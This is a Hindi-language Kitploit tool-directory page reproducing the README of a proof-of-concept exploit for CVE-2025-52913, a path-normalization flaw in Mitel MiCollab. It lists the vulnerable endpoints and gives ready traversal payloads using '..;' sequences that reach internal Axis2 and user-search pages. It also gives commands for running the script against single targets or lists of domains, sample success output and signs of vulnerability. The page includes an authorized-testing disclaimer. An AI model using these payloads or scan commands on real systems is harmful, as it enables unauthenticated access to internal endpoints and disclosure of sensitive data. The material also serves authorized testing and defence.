Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-CVE-2025-52913 — CVE-2025-52913 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC), जो Mitel MiCollab को प्रभावित करने वाली एक पथ सामान्यीकरण (path normalization) भेद्यता है। | Kitploit
उपकरण/GitHubGitHub/pgasus99/poc-cve-2025-52913
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubpgasus99/poc-cve-2025-52913

PoC-CVE-2025-52913

CVE-2025-52913 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC), जो Mitel MiCollab को प्रभावित करने वाली एक पथ सामान्यीकरण (path normalization) भेद्यता है।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-52913 - MiCollab पथ सामान्यीकरण भेद्यता

📌 अवलोकन

इस रिपॉजिटरी में CVE-2025-52913 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है, जो Mitel MiCollab को प्रभावित करने वाली एक पथ सामान्यीकरण भेद्यता है।

यह समस्या बिना प्रमाणीकरण के हमलावरों को ..; जैसे विशेष रूप से तैयार किए गए URL अनुक्रमों का उपयोग करके इच्छित पथ प्रतिबंधों को बायपास करने और आंतरिक एप्लिकेशन एंडपॉइंट्स तक पहुंच प्राप्त करने की अनुमति देती है।


⚠️ प्रभाव

सफल शोषण से निम्न हो सकता है:

  • आंतरिक और प्रतिबंधित एंडपॉइंट्स तक पहुंच
  • संवेदनशील एप्लिकेशन घटकों का अनावरण
  • संभावित सूचना प्रकटीकरण

🎯 प्रभावित एंडपॉइंट्स

यह भेद्यता निम्नलिखित पथों के माध्यम से ट्रिगर की जा सकती है:

root@kitploit:~
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/

💣 पेलोड्स

उदाहरण ट्रैवर्सल पेलोड्स:

root@kitploit:~
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do

🚀 उपयोग

1. निर्भरताएँ स्थापित करें

root@kitploit:~
pip install -r requirements.txt

2. एकल लक्ष्य पर चलाएँ

root@kitploit:~
python3 POC-CVE-2025-52913.py example.com

3. एकाधिक लक्ष्यों पर चलाएँ

root@kitploit:~
python3 POC-CVE-2025-52913.py domains.txt

🧪 उदाहरण

root@kitploit:~
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
    [!] Possible success

🔍 पहचान

एक लक्ष्य संभवतः असुरक्षित है यदि:

  • सर्वर HTTP 200 के साथ प्रतिक्रिया करता है

  • प्रतिक्रिया में निम्नलिखित शामिल है:

    • Axis2
    • Axis2 Happiness Page
    • आंतरिक एंडपॉइंट्स से मान्य एप्लिकेशन आउटपुट

🛠️ तकनीकी विवरण

यह भेद्यता ..; युक्त विशेष रूप से तैयार किए गए पथों के अनुचित सामान्यीकरण के कारण उत्पन्न होती है, जो इच्छित एप्लिकेशन संदर्भ से परे ट्रैवर्सल की अनुमति देती है।

यह व्यवहार निम्नलिखित आंतरिक सेवाओं को उजागर कर सकता है:

  • Axis2 वेब सेवा इंटरफ़ेस
  • आंतरिक उपयोगकर्ता प्रबंधन एंडपॉइंट्स

👤 खोज

Dahmani Toumi द्वारा खोजा गया


📚 संदर्भ

  • CVE: CVE-2025-52913
  • (उपलब्ध होने पर विक्रेता सलाह या NVD लिंक जोड़ें)

⚖️ अस्वीकरण

यह परियोजना केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है।

इस टूल का उपयोग स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध न करें। लेखक किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।


टूल डाउनलोड करें